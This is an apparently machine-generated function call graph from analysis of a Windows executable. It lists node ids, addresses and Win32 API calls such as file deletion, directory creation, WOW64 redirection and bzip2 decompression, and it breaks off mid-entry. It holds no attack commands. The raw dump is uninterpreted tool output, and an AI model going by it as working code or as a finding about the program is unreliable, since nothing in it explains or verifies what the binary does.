TlsGetValue TlsGetValue VariantClear 52996->53044 52999 491146 53000 491157 CharToOemBuffA 52999->53000 53051 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53000->53051 53003 446854 53002->53003 53056 4358cc 53003->53056 53005 446873 53005->52882 53007 446ad4 53006->53007 53082 435c34 VariantClear 53007->53082 53009 446af7 53010 446b0e 53009->53010 53083 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53009->53083 53010->52933 53012->52871 53013->52889 53014->52893 53015->52897 53016->52903 53017->52896 53018->52902 53019->52907 53020->52916 53021->52913 53022->52905 53023->52915 53024->52922 53025->52926 53026->52933 53027->52927 53028->52934 53029->52938 53030->52937 53031->52942 53032->52947 53033->52913 53034->52946 53035->52953 53036->52959 53037->52933 53084 403738 53038->53084 53041->52977 53042->52986 53043->52990 53044->52913 53045->52913 53046->52973 53047->52933 53048->52993 53049->52933 53050->52999 53051->52933 53053 403426 53052->53053 53054 40344b 53053->53054 53055 402660 4 API calls 53053->53055 53055->53053 53057 4358d8 53056->53057 53058 4358fa 53056->53058 53057->53058 53076 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53057->53076 53059 43597d 53058->53059 53061 435941 53058->53061 53062 435971 53058->53062 53063 435965 53058->53063 53064 43594d 53058->53064 53073 435959 53058->53073 53081 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53059->53081 53077 403510 53061->53077 53080 4040e8 18 API calls 53062->53080 53068 403494 4 API calls 53063->53068 53067 403510 4 API calls 53064->53067 53072 435956 53067->53072 53074 43596e 53068->53074 53071 43598e 53071->53005 53072->53005 53073->53005 53074->53005 53075 43597a 53075->53005 53076->53058 53078 4034e0 4 API calls 53077->53078 53079 40351d 53078->53079 53079->53005 53080->53075 53081->53071 53082->53009 53083->53010 53085 40373c LoadLibraryA 53084->53085 53085->52961 53086 416b52 53087 416bfa 53086->53087 53088 416b6a 53086->53088 53105 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53087->53105 53090 416b84 SendMessageA 53088->53090 53091 416b78 53088->53091 53092 416bd8 53090->53092 53093 416b82 CallWindowProcA 53091->53093 53094 416b9e 53091->53094 53093->53092 53102 41a068 GetSysColor 53094->53102 53097 416ba9 SetTextColor 53098 416bbe 53097->53098 53103 41a068 GetSysColor 53098->53103 53100 416bc3 SetBkColor 53104 41a6f0 GetSysColor CreateBrushIndirect 53100->53104 53102->53097 53103->53100 53104->53092 53105->53092 60517 40ce34 60520 406f18 WriteFile 60517->60520 60521 406f35 60520->60521 53106 416654 53107 416661 53106->53107 53108 4166bb 53106->53108 53113 416560 CreateWindowExA 53107->53113 53109 416668 SetPropA SetPropA 53109->53108 53110 41669b 53109->53110 53111 4166ae SetWindowPos 53110->53111 53111->53108 53113->53109 53114 42e317 SetErrorMode 53115 42f394 53116 42f3a3 NtdllDefWindowProc_A 53115->53116 53117 42f39f 53115->53117 53116->53117 60522 4222f4 60523 422303 60522->60523 60528 421284 60523->60528 60527 422323 60529 4212f3 60528->60529 60530 421293 60528->60530 60534 421304 60529->60534 60553 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60529->60553 60530->60529 60552 408d34 19 API calls 60530->60552 60532 4213ca 60539 4213de SetMenu 60532->60539 60549 4213a3 60532->60549 60533 421332 60538 4213a5 60533->60538 60543 42134d 60533->60543 60534->60532 60534->60533 60535 4213f6 60556 4211cc 10 API calls 60535->60556 60541 4213b9 60538->60541 60538->60549 60539->60549 60540 4213fd 60540->60527 60551 4221f8 10 API calls 60540->60551 60544 4213c2 SetMenu 60541->60544 60545 421370 GetMenu 60543->60545 60543->60549 60544->60549 60546 421393 60545->60546 60547 42137a 60545->60547 60554 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 60546->60554 60550 42138d SetMenu 60547->60550 60549->60535 60555 421e3c 11 API calls 60549->60555 60550->60546 60551->60527 60552->60530 60553->60534 60554->60549 60555->60535 60556->60540 53118 2302127 53119 2302130 53118->53119 53120 230210a 53119->53120 53121 45cff4 5 API calls 53119->53121 53121->53120 60557 44acfc 60558 44ad0a 60557->60558 60560 44ad29 60557->60560 60559 44abe0 11 API calls 60558->60559 60558->60560 60559->60560 60561 447f7c 60562 447fb1 60561->60562 60563 447faa 60561->60563 60564 447fd0 60562->60564 60565 447fba 60562->60565 60566 403400 4 API calls 60563->60566 60568 403494 4 API calls 60564->60568 60607 447d80 7 API calls 60565->60607 60569 44815b 60566->60569 60571 447fde 60568->60571 60570 447fc5 60570->60564 60572 447fc9 60570->60572 60573 4037b8 4 API calls 60571->60573 60572->60563 60574 447ffa 60573->60574 60575 4037b8 4 API calls 60574->60575 60576 448016 60575->60576 60576->60563 60577 44802a 60576->60577 60578 4037b8 4 API calls 60577->60578 60579 448044 60578->60579 60580 431424 4 API calls 60579->60580 60581 448066 60580->60581 60582 4314f4 4 API calls 60581->60582 60589 448086 60581->60589 60582->60581 60583 4480dc 60596 441b88 60583->60596 60584 4480c4 60584->60583 60609 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60584->60609 60588 448110 GetLastError 60610 447d14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60588->60610 60589->60584 60608 442e24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60589->60608 60591 44811f 60611 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60591->60611 60593 448134 60612 442e74 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60593->60612 60595 44813c 60597 442b66 60596->60597 60598 441bc1 60596->60598 60600 403400 4 API calls 60597->60600 60599 403400 4 API calls 60598->60599 60601 441bc9 60599->60601 60602 442b7b 60600->60602 60603 431424 4 API calls 60601->60603 60602->60588 60604 441bd5 60603->60604 60605 442b56 60604->60605 60613 441260 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60604->60613 60605->60588 60607->60570 60608->60589 60609->60583 60610->60591 60611->60593 60612->60595 60613->60604 60614 47ef3e 60615 450664 5 API calls 60614->60615 60616 47ef52 60615->60616 60617 47e064 21 API calls 60616->60617 60618 47ef76 60617->60618 53122 48fed4 53123 48ff0e 53122->53123 53124 48ff1a 53123->53124 53125 48ff10 53123->53125 53127 48ff29 53124->53127 53128 48ff52 53124->53128 53317 4090a0 MessageBeep 53125->53317 53130 44684c 18 API calls 53127->53130 53135 48ff8a 53128->53135 53136 48ff61 53128->53136 53129 403420 4 API calls 53131 490566 53129->53131 53132 48ff36 53130->53132 53133 403400 4 API calls 53131->53133 53318 406bb8 53132->53318 53137 49056e 53133->53137 53143 48ff99 53135->53143 53144 48ffc2 53135->53144 53139 44684c 18 API calls 53136->53139 53140 48ff6e 53139->53140 53326 406c08 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53140->53326 53146 44684c 18 API calls 53143->53146 53149 48ffea 53144->53149 53150 48ffd1 53144->53150 53145 48ff79 53327 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53145->53327 53148 48ffa6 53146->53148 53328 406c3c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53148->53328 53157 48fff9 53149->53157 53158 49001e 53149->53158 53330 407288 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetCurrentDirectoryA 53150->53330 53153 48ffb1 53329 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53153->53329 53154 48ffd9 53331 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53154->53331 53159 44684c 18 API calls 53157->53159 53161 49002d 53158->53161 53162 490056 53158->53162 53160 490006 53159->53160 53332 4072b0 53160->53332 53164 44684c 18 API calls 53161->53164 53170 49008e 53162->53170 53171 490065 53162->53171 53166 49003a 53164->53166 53165 49000e 53335 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53165->53335 53336 42c7d0 53166->53336 53168 48ff15 53168->53129 53177 4900da 53170->53177 53178 49009d 53170->53178 53173 44684c 18 API calls 53171->53173 53174 490072 53173->53174 53346 407200 8 API calls 53174->53346 53183 4900e9 53177->53183 53184 490112 53177->53184 53180 44684c 18 API calls 53178->53180 53179 49007d 53347 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53179->53347 53182 4900ac 53180->53182 53185 44684c 18 API calls 53182->53185 53186 44684c 18 API calls 53183->53186 53191 49014a 53184->53191 53192 490121 53184->53192 53187 4900bd 53185->53187 53188 4900f6 53186->53188 53348 48fbd8 8 API calls 53187->53348 53350 42c870 53188->53350 53200 490159 53191->53200 53201 490182 53191->53201 53195 44684c 18 API calls 53192->53195 53193 4900c9 53349 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53193->53349 53197 49012e 53195->53197 53356 42c898 53197->53356 53203 44684c 18 API calls 53200->53203 53206 4901ba 53201->53206 53207 490191 53201->53207 53205 490166 53203->53205 53365 42c8c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53205->53365 53214 4901c9 53206->53214 53215 4901f2 53206->53215 53209 44684c 18 API calls 53207->53209 53211 49019e 53209->53211 53210 490171 53366 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53210->53366 53367 42c8f8 53211->53367 53217 44684c 18 API calls 53214->53217 53220 49023e 53215->53220 53221 490201 53215->53221 53219 4901d6 53217->53219 53373 42c920 53219->53373 53227 49024d 53220->53227 53228 490290 53220->53228 53224 44684c 18 API calls 53221->53224 53226 490210 53224->53226 53229 44684c 18 API calls 53226->53229 53230 44684c 18 API calls 53227->53230 53236 49029f 53228->53236 53237 490303 53228->53237 53231 490221 53229->53231 53232 490260 53230->53232 53379 42c4c4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 53231->53379 53234 44684c 18 API calls 53232->53234 53238 490271 53234->53238 53235 49022d 53380 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53235->53380 53240 44684c 18 API calls 53236->53240 53243 490342 53237->53243 53244 490312 53237->53244 53381 48fdd0 12 API calls 53238->53381 53241 4902ac 53240->53241 53309 42c5d4 7 API calls 53241->53309 53255 490381 53243->53255 53256 490351 53243->53256 53247 44684c 18 API calls 53244->53247 53246 49027f 53382 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53246->53382 53250 49031f 53247->53250 53248 4902ba 53251 4902be 53248->53251 53252 4902f3 53248->53252 53385 451f68 53250->53385 53254 44684c 18 API calls 53251->53254 53384 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53252->53384 53259 4902cd 53254->53259 53264 4903c0 53255->53264 53265 490390 53255->53265 53260 44684c 18 API calls 53256->53260 53258 49032c 53392 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53258->53392 53310 4522e0 53259->53310 53263 49035e 53260->53263 53393 451dd0 53263->53393 53274 490408 53264->53274 53275 4903cf 53264->53275 53268 44684c 18 API calls 53265->53268 53266 4902dd 53383 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53266->53383 53271 49039d 53268->53271 53270 49036b 53400 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53270->53400 53401 452470 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 53271->53401 53281 490450 53274->53281 53282 490417 53274->53282 53277 44684c 18 API calls 53275->53277 53276 4903aa 53402 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53276->53402 53278 4903de 53277->53278 53280 44684c 18 API calls 53278->53280 53283 4903ef 53280->53283 53286 490463 53281->53286 53293 490519 53281->53293 53284 44684c 18 API calls 53282->53284 53288 446acc 5 API calls 53283->53288 53285 490426 53284->53285 53287 44684c 18 API calls 53285->53287 53289 44684c 18 API calls 53286->53289 53290 490437 53287->53290 53288->53168 53291 490490 53289->53291 53294 446acc 5 API calls 53290->53294 53292 44684c 18 API calls 53291->53292 53295 4904a7 53292->53295 53293->53168 53406 4467f0 18 API calls 53293->53406 53294->53168 53403 407de4 7 API calls 53295->53403 53297 490532 53407 42e73c FormatMessageA 53297->53407 53301 4904c9 53303 44684c 18 API calls 53301->53303 53304 4904dd 53303->53304 53404 408510 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53304->53404 53306 4904e8 53405 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53306->53405 53308 4904f4 53309->53248 53412 451d84 53310->53412 53312 4522fd 53312->53266 53313 4522f9 53313->53312 53314 452321 MoveFileA GetLastError 53313->53314 53418 451dc0 53314->53418 53317->53168 53319 406bc7 53318->53319 53320 406be0 53319->53320 53321 406be9 53319->53321 53322 403400 4 API calls 53320->53322 53421 403778 53321->53421 53324 406be7 53322->53324 53325 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53324->53325 53325->53168 53326->53145 53327->53168 53328->53153 53329->53168 53330->53154 53331->53168 53333 403738 53332->53333 53334 4072ba SetCurrentDirectoryA 53333->53334 53334->53165 53335->53168 53337 403738 53336->53337 53338 42c7f3 GetFullPathNameA 53337->53338 53339 42c816 53338->53339 53340 42c7ff 53338->53340 53341 403494 4 API calls 53339->53341 53340->53339 53342 42c807 53340->53342 53343 42c814 53341->53343 53344 4034e0 4 API calls 53342->53344 53345 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53343->53345 53344->53343 53345->53168 53346->53179 53347->53168 53348->53193 53349->53168 53428 42c768 53350->53428 53353 403778 4 API calls 53354 42c891 53353->53354 53355 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53354->53355 53355->53168 53443 42c640 53356->53443 53359 42c8b5 53362 403778 4 API calls 53359->53362 53360 42c8ac 53361 403400 4 API calls 53360->53361 53363 42c8b3 53361->53363 53362->53363 53364 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53363->53364 53364->53168 53365->53210 53366->53168 53368 42c768 IsDBCSLeadByte 53367->53368 53369 42c908 53368->53369 53370 403778 4 API calls 53369->53370 53371 42c91a 53370->53371 53372 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53371->53372 53372->53168 53374 42c768 IsDBCSLeadByte 53373->53374 53375 42c930 53374->53375 53376 403778 4 API calls 53375->53376 53377 42c941 53376->53377 53378 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53377->53378 53378->53168 53379->53235 53380->53168 53381->53246 53382->53168 53383->53168 53384->53168 53386 451d84 2 API calls 53385->53386 53388 451f7e 53386->53388 53387 451f82 53387->53258 53388->53387 53389 451f9e DeleteFileA GetLastError 53388->53389 53390 451dc0 Wow64RevertWow64FsRedirection 53389->53390 53391 451fc4 53390->53391 53391->53258 53392->53168 53394 451d84 2 API calls 53393->53394 53395 451de6 53394->53395 53396 451dea 53395->53396 53397 451e08 CreateDirectoryA GetLastError 53395->53397 53396->53270 53398 451dc0 Wow64RevertWow64FsRedirection 53397->53398 53399 451e2e 53398->53399 53399->53270 53400->53168 53401->53276 53402->53168 53403->53301 53404->53306 53405->53308 53406->53297 53408 42e762 53407->53408 53409 4034e0 4 API calls 53408->53409 53410 42e77f 53409->53410 53411 446ba0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53410->53411 53411->53168 53413 451d92 53412->53413 53414 451d8e 53412->53414 53415 451db4 SetLastError 53413->53415 53416 451d9b Wow64DisableWow64FsRedirection 53413->53416 53414->53313 53417 451daf 53415->53417 53416->53417 53417->53313 53419 451dc5 Wow64RevertWow64FsRedirection 53418->53419 53420 451dcf 53418->53420 53419->53420 53420->53266 53422 4037aa 53421->53422 53423 40377d 53421->53423 53424 403400 4 API calls 53422->53424 53423->53422 53426 403791 53423->53426 53425 4037a0 53424->53425 53425->53324 53427 4034e0 4 API calls 53426->53427 53427->53425 53433 42c648 53428->53433 53430 42c7c7 53430->53353 53431 42c77d 53431->53430 53440 42c454 IsDBCSLeadByte 53431->53440 53437 42c659 53433->53437 53434 42c6bd 53436 42c6b8 53434->53436 53442 42c454 IsDBCSLeadByte 53434->53442 53436->53431 53437->53434 53439 42c677 53437->53439 53439->53436 53441 42c454 IsDBCSLeadByte 53439->53441 53440->53431 53441->53439 53442->53436 53444 42c648 IsDBCSLeadByte 53443->53444 53445 42c647 53444->53445 53445->53359 53445->53360 60619 4165fc 73A15CF0 53446 46ad18 53447 46ad4e 53446->53447 53482 46b037 53446->53482 53449 46ad8a 53447->53449 53452 46add4 53447->53452 53453 46ade5 53447->53453 53454 46adb2 53447->53454 53455 46adc3 53447->53455 53456 46ada1 53447->53456 53448 403400 4 API calls 53450 46b071 53448->53450 53449->53482 53541 4683b4 53449->53541 53459 403400 4 API calls 53450->53459 53722 46aa98 67 API calls 53452->53722 53723 46aca8 45 API calls 53453->53723 53721 46a790 42 API calls 53454->53721 53506 46a8d8 53455->53506 53486 46a628 53456->53486 53463 46b079 53459->53463 53464 46ae1e 53477 46ae60 53464->53477 53464->53482 53724 493200 53464->53724 53467 46af71 53743 481938 123 API calls 53467->53743 53468 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53468->53477 53471 46af84 53471->53482 53472 42cb8c 6 API calls 53472->53477 53477->53467 53477->53468 53477->53472 53478 46afd8 53477->53478 53479 46b01a 53477->53479 53477->53482 53483 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53477->53483 53544 4682f0 53477->53544 53552 469f08 53477->53552 53559 469640 53477->53559 53612 469fe8 53477->53612 53650 48146c 53477->53650 53752 46a3e4 19 API calls 53477->53752 53744 457114 53478->53744 53480 469fe8 23 API calls 53479->53480 53480->53482 53482->53448 53483->53477 53485 457114 24 API calls 53485->53479 53753 414af8 53486->53753 53488 46a65a 53493 493200 18 API calls 53488->53493 53497 46a69b 53488->53497 53489 46a6a1 53494 46a6c3 53489->53494 53757 46c45c 53489->53757 53490 46a6d8 53491 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53490->53491 53492 46a70d 53490->53492 53491->53492 53766 47d508 42 API calls 53492->53766 53493->53497 53761 414b28 53494->53761 53497->53489 53497->53490 53499 46a6d6 53504 403400 4 API calls 53499->53504 53500 46a721 53500->53499 53503 414b28 4 API calls 53500->53503 53502 403450 4 API calls 53502->53494 53503->53499 53505 46a766 53504->53505 53505->53449 53779 46b4a8 53506->53779 53509 46aa5a 53511 403420 4 API calls 53509->53511 53510 414af8 4 API calls 53513 46a926 53510->53513 53512 46aa74 53511->53512 53514 403400 4 API calls 53512->53514 53539 46aa46 53513->53539 53782 4554a0 13 API calls 53513->53782 53515 46aa7c 53514->53515 53518 403400 4 API calls 53515->53518 53517 403450 4 API calls 53517->53509 53520 46aa84 53518->53520 53519 46a944 53540 46a9a9 53519->53540 53783 465d14 53519->53783 53520->53449 53522 42cd14 7 API calls 53525 46aa1f 53522->53525 53532 450ab8 4 API calls 53525->53532 53525->53539 53529 465d14 19 API calls 53531 46a984 53529->53531 53787 450a88 53531->53787 53535 46aa36 53532->53535 53533 46aa09 53533->53509 53533->53522 53533->53539 53799 47d508 42 API calls 53535->53799 53539->53509 53539->53517 53540->53509 53540->53533 53792 42cd14 53540->53792 53542 4682f0 19 API calls 53541->53542 53543 4683c3 53542->53543 53543->53464 53547 46831f 53544->53547 53545 4078fc 19 API calls 53546 468358 53545->53546 54019 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53546->54019 53547->53545 53549 468360 53547->53549 53550 403400 4 API calls 53549->53550 53551 468378 53550->53551 53551->53477 53553 469f14 53552->53553 53554 469f19 53552->53554 53555 469f17 53553->53555 54020 469974 53553->54020 54105 4691c0 46 API calls 53554->54105 53555->53477 53557 469f21 53557->53477 53560 403400 4 API calls 53559->53560 53561 46966d 53560->53561 54455 47c564 53561->54455 53563 469692 53564 469696 53563->53564 53565 4696ac 53563->53565 54473 465f14 53564->54473 53567 4696a0 53565->53567 54476 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53565->54476 53570 469771 53567->53570 53571 4697dc 53567->53571 53611 4698a5 53567->53611 53569 403420 4 API calls 53573 4698e1 53569->53573 53574 403494 4 API calls 53570->53574 53575 403494 4 API calls 53571->53575 53572 4696c8 53572->53567 53576 4696d0 53572->53576 53573->53477 53577 46977e 53574->53577 53578 4697e9 53575->53578 53579 469fe8 23 API calls 53576->53579 53581 40357c 4 API calls 53577->53581 53582 40357c 4 API calls 53578->53582 53580 4696dd 53579->53580 54477 42f3d4 53580->54477 53584 46978b 53581->53584 53585 4697f6 53582->53585 53587 40357c 4 API calls 53584->53587 53588 40357c 4 API calls 53585->53588 53591 469798 53587->53591 53589 469803 53588->53589 53593 40357c 4 API calls 53589->53593 53592 40357c 4 API calls 53591->53592 53595 4697a5 53592->53595 53596 469810 53593->53596 53594 469724 53594->53477 53597 465f14 20 API calls 53595->53597 53598 40357c 4 API calls 53596->53598 53599 4697b3 53597->53599 53600 46981e 53598->53600 53601 40357c 4 API calls 53599->53601 53602 414b28 4 API calls 53600->53602 53603 4697bc 53601->53603 53604 4697da 53602->53604 53605 40357c 4 API calls 53603->53605 54494 46624c 53604->54494 53607 4697c9 53605->53607 53608 414b28 4 API calls 53607->53608 53608->53604 53611->53569 53613 4682f0 19 API calls 53612->53613 53615 46a000 53613->53615 53614 46a034 54656 4649f4 53614->54656 53615->53614 53616 4649f4 7 API calls 53615->53616 53616->53614 53620 46a04c 53622 46a133 53620->53622 53623 46a09a 53620->53623 54677 469f9c 19 API calls 53620->54677 53625 46a1f2 GetSystemMenu EnableMenuItem 53622->53625 53624 4682f0 19 API calls 53623->53624 53624->53622 53626 414b28 4 API calls 53625->53626 53627 46a212 53626->53627 53628 46a21e 53627->53628 53629 46a248 53627->53629 53630 414b28 4 API calls 53628->53630 53632 46a264 53629->53632 53633 46a28e 53629->53633 53631 46a232 53630->53631 53634 414b28 4 API calls 53631->53634 53635 414b28 4 API calls 53632->53635 53636 414b28 4 API calls 53633->53636 53637 46a246 53634->53637 53638 46a278 53635->53638 53639 46a2a2 53636->53639 54673 469f30 53637->54673 53640 414b28 4 API calls 53638->53640 53641 414b28 4 API calls 53639->53641 53640->53637 53641->53637 53645 4683b4 19 API calls 53648 46a340 53645->53648 53646 46a2e0 53646->53645 53647 46a3a3 53647->53477 53648->53647 54679 49314c 18 API calls 53648->54679 53651 46b4a8 47 API calls 53650->53651 53652 4814af 53651->53652 53653 4814b8 53652->53653 54879 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53652->54879 53655 414af8 4 API calls 53653->53655 53656 4814c8 53655->53656 53657 403450 4 API calls 53656->53657 53658 4814d5 53657->53658 54699 46b7b8 53658->54699 53661 4814e5 53662 414af8 4 API calls 53661->53662 53664 4814f5 53662->53664 53665 403450 4 API calls 53664->53665 53666 481502 53665->53666 53667 468fa8 SendMessageA 53666->53667 53668 48151b 53667->53668 53669 481559 53668->53669 54881 478a14 23 API calls 53668->54881 53671 4241ec 11 API calls 53669->53671 53672 481563 53671->53672 53673 481589 53672->53673 53674 481574 SetActiveWindow 53672->53674 54728 480a68 53673->54728 53674->53673 53721->53449 53722->53449 53723->53449 56599 43d21c 53724->56599 53727 49322c 56604 431424 53727->56604 53728 4932b2 53729 4932c1 53728->53729 56637 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53728->56637 53729->53477 53738 493276 56635 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53738->56635 53740 49328a 56636 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53740->56636 53742 4932aa 53742->53477 53743->53471 53745 457139 53744->53745 53746 457159 53745->53746 53747 4078fc 19 API calls 53745->53747 53749 403400 4 API calls 53746->53749 53748 457151 53747->53748 53750 456f08 24 API calls 53748->53750 53751 45716e 53749->53751 53750->53746 53751->53485 53752->53477 53754 414b06 53753->53754 53755 4034e0 4 API calls 53754->53755 53756 414b13 53755->53756 53756->53488 53758 46a6b6 53757->53758 53759 46c465 53757->53759 53758->53502 53767 46c53c 53759->53767 53762 414af8 4 API calls 53761->53762 53763 414b4c 53762->53763 53764 403400 4 API calls 53763->53764 53765 414b7d 53764->53765 53765->53499 53766->53500 53768 46c543 53767->53768 53771 45cf00 53768->53771 53772 45cf0b 53771->53772 53773 45cf26 VirtualAlloc 53772->53773 53774 45cf45 53773->53774 53775 45cf4a BZ2_bzDecompressInit 53773->53775 53774->53775 53778 45ce5c 19 API calls 53775->53778 53777 45cf8f 53777->53758 53778->53777 53800 46b534 53779->53800 53782->53519 53784 465d2e 53783->53784 53970 4078fc 53784->53970 53788 450aa8 53787->53788 53989 450960 53788->53989 54013 42cc98 53792->54013 53795 450ab8 53796 450a88 4 API calls 53795->53796 53797 450ad4 53796->53797 53798 47d508 42 API calls 53797->53798 53798->53533 53799->53539 53801 414af8 4 API calls 53800->53801 53802 46b566 53801->53802 53854 465fac 53802->53854 53805 414b28 4 API calls 53806 46b578 53805->53806 53807 46b587 53806->53807 53810 46b5a0 53806->53810 53904 47d508 42 API calls 53807->53904 53809 46b59b 53811 403420 4 API calls 53809->53811 53812 46b5e7 53810->53812 53814 46b5ce 53810->53814 53813 46a90a 53811->53813 53815 46b64c 53812->53815 53828 46b5eb 53812->53828 53813->53509 53813->53510 53905 47d508 42 API calls 53814->53905 53907 42cb18 CharNextA 53815->53907 53818 46b65b 53819 46b65f 53818->53819 53822 46b678 53818->53822 53908 47d508 42 API calls 53819->53908 53821 46b633 53906 47d508 42 API calls 53821->53906 53823 46b69c 53822->53823 53863 46611c 53822->53863 53909 47d508 42 API calls 53823->53909 53827 46b68c 53827->53823 53868 46614c 53827->53868 53828->53821 53828->53822 53831 46b6b5 53832 403778 4 API calls 53831->53832 53833 46b6cb 53832->53833 53872 42c968 53833->53872 53836 46b6dc 53910 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53836->53910 53837 46b70a 53839 42c898 5 API calls 53837->53839 53841 46b715 53839->53841 53840 46b6ef 53842 450ab8 4 API calls 53840->53842 53876 42c40c 53841->53876 53844 46b6fc 53842->53844 53911 47d508 42 API calls 53844->53911 53845 46b720 53886 42cb8c 53845->53886 53859 465fc6 53854->53859 53855 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53855->53859 53857 42cb8c 6 API calls 53857->53859 53858 403450 4 API calls 53858->53859 53859->53855 53859->53857 53859->53858 53860 46600f 53859->53860 53913 42ca78 53859->53913 53861 403420 4 API calls 53860->53861 53862 466029 53861->53862 53862->53805 53865 466126 53863->53865 53864 466147 53864->53827 53865->53864 53866 466139 53865->53866 53943 42cb08 CharNextA 53865->53943 53866->53827 53869 466156 53868->53869 53870 466183 53869->53870 53944 42cb08 CharNextA 53869->53944 53870->53823 53870->53831 53873 42c9c1 53872->53873 53874 42c97e 53872->53874 53873->53836 53873->53837 53874->53873 53945 42cb08 CharNextA 53874->53945 53877 42c416 53876->53877 53878 42c439 53876->53878 53946 42c948 CharPrevA 53877->53946 53879 403494 4 API calls 53878->53879 53881 42c442 53879->53881 53881->53845 53882 42c41d 53882->53878 53883 42c428 53882->53883 53947 4035c0 53883->53947 53885 42c436 53885->53845 53887 42c648 IsDBCSLeadByte 53886->53887 53890 42cb9d 53887->53890 53888 42cbc4 53891 42cbda 53888->53891 53892 42cbcf 53888->53892 53890->53888 53969 42cb10 CharPrevA 53890->53969 53904->53809 53905->53809 53906->53809 53907->53818 53908->53809 53909->53809 53910->53840 53911->53809 53914 403494 4 API calls 53913->53914 53915 42ca88 53914->53915 53920 42cabe 53915->53920 53922 403744 53915->53922 53926 42c454 IsDBCSLeadByte 53915->53926 53918 42cb02 53918->53859 53920->53918 53927 4037b8 53920->53927 53932 42c454 IsDBCSLeadByte 53920->53932 53923 40374a 53922->53923 53925 40375b 53922->53925 53924 4034bc 4 API calls 53923->53924 53923->53925 53924->53925 53925->53915 53926->53915 53928 403744 4 API calls 53927->53928 53930 4037c6 53928->53930 53929 4037fc 53929->53920 53930->53929 53933 4038a4 53930->53933 53932->53920 53934 4038b1 53933->53934 53941 4038e1 53933->53941 53936 4038da 53934->53936 53939 4038bd 53934->53939 53935 403400 4 API calls 53938 4038cb 53935->53938 53937 4034bc 4 API calls 53936->53937 53937->53941 53938->53929 53942 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53939->53942 53941->53935 53942->53938 53943->53865 53944->53869 53945->53874 53946->53882 53948 4035c4 53947->53948 53957 40357c 53947->53957 53949 403450 53948->53949 53950 4035e2 53948->53950 53951 4035d4 53948->53951 53948->53957 53953 403464 53949->53953 53954 4034bc 4 API calls 53949->53954 53956 4034bc 4 API calls 53950->53956 53955 403450 4 API calls 53951->53955 53952 403490 53952->53885 53953->53952 53960 402660 4 API calls 53953->53960 53954->53953 53955->53957 53965 4035f5 53956->53965 53957->53949 53958 4035bf 53957->53958 53959 40358a 53957->53959 53958->53885 53961 4035b4 53959->53961 53962 40359d 53959->53962 53960->53952 53964 4038a4 4 API calls 53961->53964 53963 4038a4 4 API calls 53962->53963 53969->53890 53973 407910 53970->53973 53974 40792d 53973->53974 53981 4075c0 53974->53981 53977 407959 53979 4034e0 4 API calls 53977->53979 53980 40790b 53979->53980 53980->53529 53984 4075db 53981->53984 53982 4075ed 53982->53977 53986 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53982->53986 53984->53982 53987 4076e2 19 API calls 53984->53987 53988 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53984->53988 53986->53977 53987->53984 53988->53984 53990 403400 4 API calls 53989->53990 53998 450991 53990->53998 53991 4509bc 53992 403420 4 API calls 53991->53992 53994 4509a8 53999 